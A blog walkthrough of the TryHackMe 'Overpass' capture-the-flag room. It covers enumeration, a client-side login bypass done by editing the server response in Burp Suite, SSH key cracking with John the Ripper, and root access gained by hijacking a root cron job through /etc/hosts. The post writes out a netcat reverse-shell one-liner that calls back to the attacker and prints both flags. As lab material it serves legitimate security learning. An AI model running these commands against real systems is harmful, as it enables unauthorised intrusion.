Vuk Markovic - BlogTryHackMe - Overpass

Title Image

Overpass Walk-through By V

Enumeration:

First we are going to run our nmap. The command we are going to use is:

nmap -A -T4 -sV IP -p-

The open ports that we are given are:

  • 80 HTTP
  • 22 SSH

Nikto:

Now we can use nikto -h IP command to get more information about the web page and to see if there is any relevant information that we can use to our advantage.

We got next interesting results from nikto tool:

  • /admin/
  • /downloads/

Another thing that we can do is to check the actual code by typing view-source:http://IP/login.js in URL. What we can see at the bottom is the piece of code that has:

async function login() { which has vulnerable piece of code that will let us bypass the login form.

Variable creds take credentials and variable response sends them to /api/login for validation. We also have statusOrCookie variable that takes the response.

In the end we have a conditional statement that checks for "Incorrect Credentials" and it all seems fine with it at first glance. However, it will set "SessionToken" to statusOrCookie and redirect us to admin panel.

Burpsuite:

Let's start our BurpSuite, go to Proxy tab and open browser within it. From there go to target IP on BurpSuite browser, type in the admin panel any credentials and then turn intercept to "on". After that just click on login and you will get a response in your BurpSuite session.

Now, let's modify the response:

click on "action" button --> do intercept --> response to this request --> then click on "forward" button

Since we got our response with "Incorrect Credentials", let's just delete "Incorrect Credentials" in your BurpSuite and turn off intercept.

Once we go back to our BurpSuite browser you will see a key.

Also you will see we got a user James which will come in handy when we start brute-forcing, so document the user.

John The Ripper:

Copy the key and paste it on your machine in a text document. Use the next set of commands:

  • mousepad
  • Paste the key
  • CTRL + S to save the document
  • Save it with .key extension

Now, we are going to use JohnTheRipper tool to crack the password from James user.

python /usr/share/john/ssh2john.py *.key > *.hash

With a command above we created a hash from a key that we got. Now, let's crack the password.

john *.hash /usr/share/wordlists/rockyou.txt

After that we get a password: john13

SSH Login:

Let's login to James user via SSH:

sudo ssh -i *.key james@IP

Enter password: john13

Now that we are in the targets machine, let's use a command pwd to see where we are. Now let's use ls command to list the contents of the machine, and there we will see our user.txt which is our first flag.

cat user.txt

flag: thm{65c1aaf000506e56996822c6281e6bf7}

Reverse Shell - Privilege Escalation:

For our second flag we need to gain root access. So let's change directory to /etc with a command cd /etc, now again, let's list the content of this directory with ll command.

Find a crontab and let's cat the content with a command:

cat crontab

At the bottom you will see a script that is running with root, and the command that is used is curl

Now, let's go to hosts, so type: nano hosts and inside that file change overpass.thm IP with your IP. Save the file with CTRL+O and press Enter This will connect us to the targets server in order to execute a reverse shell script.

Use CTRL+X to exit the file. Next, let's go back to our machine and open a new tab in a terminal and we are going to create next few folders that need to be in the exact order, so follow along:

  • mkdir downloads
  • cd downloads
  • mkdir src
  • cd src
  • touch buildscript.sh
  • mousepad buildscript.sh

Go to https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and paste rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR IP 1234 >/tmp/f and just put your IP into this script. CTRL+S, and close the mousepad.

Next, we are going to get out of those folders with a cd command, and we are going to run:

python3 -m http.server 80

Then, open a new tab and run netcat with a command:

nc -lvnp 1234

Wait in the netcat tab to connect to the target system. Once we are in, we can run a command whoami and we can see that we are root.

Let's run ls command, we should get a root.txt with a list of contents.

cat root.txt

flag: thm{7f336f8c359dbac18d54fdd64ea753bb}